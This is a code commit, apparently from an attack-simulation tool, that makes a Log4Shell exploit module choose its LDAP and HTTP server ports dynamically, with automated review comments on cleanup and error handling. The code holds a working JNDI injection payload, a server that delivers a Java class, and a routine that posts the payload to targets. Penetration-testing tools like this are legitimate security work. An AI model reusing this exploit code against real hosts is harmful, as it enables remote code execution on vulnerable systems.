Agent: change ldap and http ports to be chosen dynamically in log4shell

vakarisz 2022-01-05 12:04:21 +02:00
parent 0659fddac6
commit 8a120110f5
2 changed files with 14 additions and 20 deletions


@ -19,6 +19,7 @@ from infection_monkey.model import (
MONKEY_ARG, MONKEY_ARG,
VictimHost, VictimHost,
) )
from infection_monkey.network.info import get_free_tcp_port
from infection_monkey.network.tools import get_interface_to_target from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.utils.commands import build_monkey_commandline from infection_monkey.utils.commands import build_monkey_commandline
from infection_monkey.utils.monkey_dir import get_monkey_dir_path from infection_monkey.utils.monkey_dir import get_monkey_dir_path
@ -30,13 +31,13 @@ class Log4ShellExploiter(WebRCE):
_TARGET_OS_TYPE = ["linux", "windows"] _TARGET_OS_TYPE = ["linux", "windows"]
EXPLOIT_TYPE = ExploitType.VULNERABILITY EXPLOIT_TYPE = ExploitType.VULNERABILITY
_EXPLOITED_SERVICE = "Log4j" _EXPLOITED_SERVICE = "Log4j"
LDAP_PORT = 8080
CLASS_HTTP_SERVER_PORT = 1337
DOWNLOAD_TIMEOUT = 15 DOWNLOAD_TIMEOUT = 15
def __init__(self, host: VictimHost): def __init__(self, host: VictimHost):
super().__init__(host) super().__init__(host)
self._client = None self._client = None
self.ldap_port = get_free_tcp_port()
self.class_http_server_port = get_free_tcp_port()
def exploit_host(self): def exploit_host(self):
@ -53,15 +54,13 @@ class Log4ShellExploiter(WebRCE):
java_class = self.build_java_class(command) java_class = self.build_java_class(command)
class_http_server_ip = get_interface_to_target(self.host.ip_addr) class_http_server_ip = get_interface_to_target(self.host.ip_addr)
java_class_http_thread = Log4ShellExploiter.get_java_class_server_thread( java_class_http_thread = self.get_java_class_server_thread(class_http_server_ip, java_class)
class_http_server_ip, java_class
)
java_class_http_thread.start() java_class_http_thread.start()
ldap = LDAPExploitServer( ldap = LDAPExploitServer(
ldap_server_port=Log4ShellExploiter.LDAP_PORT, ldap_server_port=self.ldap_port,
http_server_ip=class_http_server_ip, http_server_ip=class_http_server_ip,
http_server_port=self.CLASS_HTTP_SERVER_PORT, http_server_port=self.class_http_server_port,
storage_dir=get_monkey_dir_path(), storage_dir=get_monkey_dir_path(),
) )
ldap_thread = ldap.get_run_thread() ldap_thread = ldap.get_run_thread()
@ -86,7 +85,7 @@ class Log4ShellExploiter(WebRCE):
def build_ldap_payload(self): def build_ldap_payload(self):
interface_ip = get_interface_to_target(self.host.ip_addr) interface_ip = get_interface_to_target(self.host.ip_addr)
return f"${{jndi:ldap://{interface_ip}:{Log4ShellExploiter.LDAP_PORT}/dn=Exploit}}" return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
def build_command(self, path, http_path): def build_command(self, path, http_path):
@ -133,20 +132,15 @@ class Log4ShellExploiter(WebRCE):
self.wfile.write(self.java_class) self.wfile.write(self.java_class)
Log4ShellExploiter.HTTPHandler.class_downloaded = True Log4ShellExploiter.HTTPHandler.class_downloaded = True
@staticmethod def _run_class_http_server(self, ip):
def _run_class_http_server(ip): server = http.server.HTTPServer((ip, self.class_http_server_port), Log4ShellExploiter.HTTPHandler)
server = http.server.HTTPServer(
(ip, Log4ShellExploiter.CLASS_HTTP_SERVER_PORT), Log4ShellExploiter.HTTPHandler
)
while ( while (
not Log4ShellExploiter.HTTPHandler.class_downloaded not Log4ShellExploiter.HTTPHandler.class_downloaded
and not Log4ShellExploiter.HTTPHandler.stop and not Log4ShellExploiter.HTTPHandler.stop
): ):
server.handle_request() server.handle_request()
@staticmethod def get_java_class_server_thread(self, ip: str, java_class: bytes):
def get_java_class_server_thread(ip: str, java_class: bytes):
Log4ShellExploiter.HTTPHandler.java_class = java_class Log4ShellExploiter.HTTPHandler.java_class = java_class
return Thread(target=Log4ShellExploiter._run_class_http_server, args=[ip]) return Thread(target=self._run_class_http_server, args=[ip])
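Review bot: `_run_class_http_server` never releases the listener it opens: as far as this section shows there is no `server.server_close()` after the `while` loop, and `handle_request()` blocks until a connection arrives, so the `stop` flag is only re-checked once a request has been served. Because the port now comes from `get_free_tcp_port()` and differs on every run, a leftover listener is harder to account for afterwards; I would set `server.timeout` before the loop and wrap the loop in `try`/`finally` with `server.server_close()`. Separately, `java_class`, `class_downloaded` and `stop` are still stored on `Log4ShellExploiter.HTTPHandler` itself, so the per-instance ports do not by themselves make two exploiter instances independent. The ports are also picked in `__init__` but bound only later, so it is worth confirming that `get_free_tcp_port()` (not shown here) cannot return the same port for both calls.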


@ -13,9 +13,9 @@ def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]):
payload = {"uname": payload, "password": "m0nk3y"} payload = {"uname": payload, "password": "m0nk3y"}
for url in urls: for url in urls:
try: try:
requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123 resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
except requests.ReadTimeout: except requests.ReadTimeout as e:
logger.debug("Couldn't send request to the vulnerable machine") logger.debug(f"Log4shell request failed {e}")
def build_urls(open_ports: List[int], host: VictimHost) -> List[str]: def build_urls(open_ports: List[int], host: VictimHost) -> List[str]:
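Review bot: The handler in `trigger_exploit` still catches only `requests.ReadTimeout`, although the new message reads as a general failure; a refused connection or a connect timeout on one URL raises a different `requests` exception, which leaves the `for url in urls` loop and propagates to the caller. If that is not intended, `except requests.RequestException as e:` covers those cases. `resp` is assigned but not read in the lines shown, and the log line would be easier to trace with the URL and lazy formatting: `logger.debug("Log4shell request to %s failed: %s", url, e)`. The start of `trigger_exploit` is outside the hunk.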